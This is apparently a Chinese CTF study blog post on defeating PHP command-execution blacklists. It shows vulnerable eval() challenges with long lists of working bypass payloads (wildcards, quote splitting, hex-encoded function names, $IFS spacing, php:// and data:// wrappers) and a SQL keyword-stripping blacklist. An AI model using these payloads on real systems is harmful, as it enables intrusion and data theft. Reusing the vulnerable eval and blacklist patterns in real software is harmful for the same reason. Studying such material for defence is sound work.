命令执行绕过技巧
命令执行绕过技巧
参考:https://blog.csdn.net/weixin_39190897/article/details/116247765
参考:https://blog.csdn.net/solitudi/article/details/109837640
正则过滤
参考:https://www.runoob.com/php/php-preg_match.html
参考:https://www.runoob.com/regexp/regexp-syntax.html
if(!preg_match("/flag/i", $c)){ eval($c); }
题目1
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
payload1
通配符 payload1:c=system("nl fla?????"); payload2:c=system("nl fla*"); payload3:c=echo `nl fl''ag.php`;或者c=echo `nl fl“”ag.php`; payload4:c=echo `nl fl\ag.php`;//转义字符绕过 payload5:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php payload6:c=eval($_GET[1]);&1=system('nl flag.php'); payload7:c=awk '{printf $0}' flag.php||
题目2
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
payload2
system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反引号` `同shell_exec() c=echo exec('nl fla?????'); c=echo `nl fla''g.p''hp`; c=echo `nl fla?????`; 还有上一道题的很多payload都可以使用
题目3
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
payload3
cat被过滤
more:一页一页的显示档案内容 less:与 more 类似 head:查看头几行 tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 tail:查看尾几行 nl:显示的时候,顺便输出行号 od:以二进制的方式读取档案内容 vi:一种编辑器,这个也可以查看 vim:一种编辑器,这个也可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 grep 1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings 2、find . -name "*.c" find . -type f :将当前目录及其子目录中的所有文件列出:
payload3
c=eval($_GET[1]);&1=system('nl flag.php'); c=highlight_file(next(array_reverse(scandir(dirname(__FILE__))))); c=show_source(next(array_reverse(scandir(pos(localeconv()))))); c=echo(`nl%09fl[abc]*`); c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*");等价于system() c=echo`strings%09f*`; c=echo`strings\$IFS\$9f*`必须加转义字符
还有其他姿势:
首先print_r(scandir(dirname(__FILE__)));查看当前目录下文件 然后找到flag.php print_r(next(array_reverse(scandir(dirname(__FILE__))))); 之后高亮显示即可 c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
小知识:include不用括号,分号可以用?>代替。
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?> c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
字符替换
参考:https://blog.csdn.net/weixin_44300286/article/details/96597167
替换字符 $id= blacklist($id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; echo $sql; echo "<br>"; function blacklist($id) { $id= preg_replace('/or/i',"", $id); //去掉OR(不区分大小写) $id= preg_replace('/and/i',"", $id); //去掉AND(不区分大小写) $id= preg_replace('/[\/\*]/',"", $id); //去掉 /* $id= preg_replace('/[--]/',"", $id); //去掉 -- $id= preg_replace('/[#]/',"", $id); //去掉 # $id= preg_replace('/[\s]/',"", $id); //去掉 空格 $id= preg_replace('/[ +]/',"", $id); //去掉 空格 $id= preg_replace('/[\/\\\\]/',"", $id); //去掉 斜杠 //$id= preg_replace('/select/m',"", $id); //去掉 空格 $id= preg_replace('/union/s',"", $id); //去掉 union $id= preg_replace('/select/s',"", $id); //去掉 select $id= preg_replace('/UNION/s',"", $id); //去掉 UNION $id= preg_replace('/SELECT/s',"", $id); //去掉 SELECT $id= preg_replace('/Union/s',"", $id); //去掉 Union $id= preg_replace('/Select/s',"", $id); //去掉 Select $id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT. return $id; }
愿路途漫长,以后莫失莫忘。 愿你不骄不躁,安稳顺心。
作者:菜鸟-传奇
本文版权归作者和博客园共有,重在学习交流,不以任何盈利为目的,欢迎转载。
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
